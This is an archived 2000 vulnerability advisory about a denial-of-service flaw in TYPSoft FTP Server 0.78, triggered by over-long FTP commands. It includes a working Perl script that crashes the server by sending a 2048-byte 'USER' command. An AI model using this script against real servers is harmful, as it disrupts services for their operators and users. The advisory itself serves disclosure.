typsoft-ftpd.txt

typsoft-ftpd.txt: Posted Sep 12, 2000; Authored by Dethy | Site synnergy.net; TYPSoft FTP Server 0.78 for Windows 9X and WinNT is vulnerable to a denial of service attack. Sending a long user or pass commands causes the server to hang and increase system resources. Perl exploit included.; tags | exploit, denial of service, perl; systems | windows; SHA-256 | 6290ed9092ce73d9e92df721518efe218bf3ccf081ac7b79d93e84f30cccd104; Download | Favorite | View

typsoft-ftpd.txt


           *******************************************
           +  TYPSoft FTP Server remote DoS Problem  +
           *******************************************
           #            Advisory by dethy            #
           #            www.synnergy.net             #
           |=========================================|

                        Advisory # 12

Vulnerable:     TYPSoft FTP Server 0.78  [ although 0.7X are also vulnerable ]
Systems   :     Win9X, WinNT
Product   :     http://www.multimania.com/typsoft/
Discovery :     dethy@synnergy.net

                " Another trivial bug. "

Description
-----------

TYPSoft FTP is a Freeware FTP server, with all the necessary
features to facilitate beginners and advanced users.


Vulnerability
-------------

TYPSoft FTP Server does not correctly deal with long commands
over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',
'cwd', etc, causing the server to hang and increase system resources.
The process will not be active until it is manually restarted.


Exploit
-------

simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.

================<cut>==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048; 
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
                    Proto       => "tcp",
                    PeerAddr    => $args{s},
                    PeerPort    => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");

sub usage {die("\n$0 -s <server>\n\n");}
================</cut>====================

Solution
--------

The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version 
comes out or use an alternative product.


Disclaimer
----------

Synnergy Networks may not be held liable for the use and/or potential effects of these
programs or advisories, nor the content contained within. Use them at your own risk.

---------------------------------------------------------------------------------------
Web     : http://www.synnergy.net
E-Mail  : dethy@synnergy.net

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

typsoft-ftpd.txt

typsoft-ftpd.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

typsoft-ftpd.txt

Share This

typsoft-ftpd.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems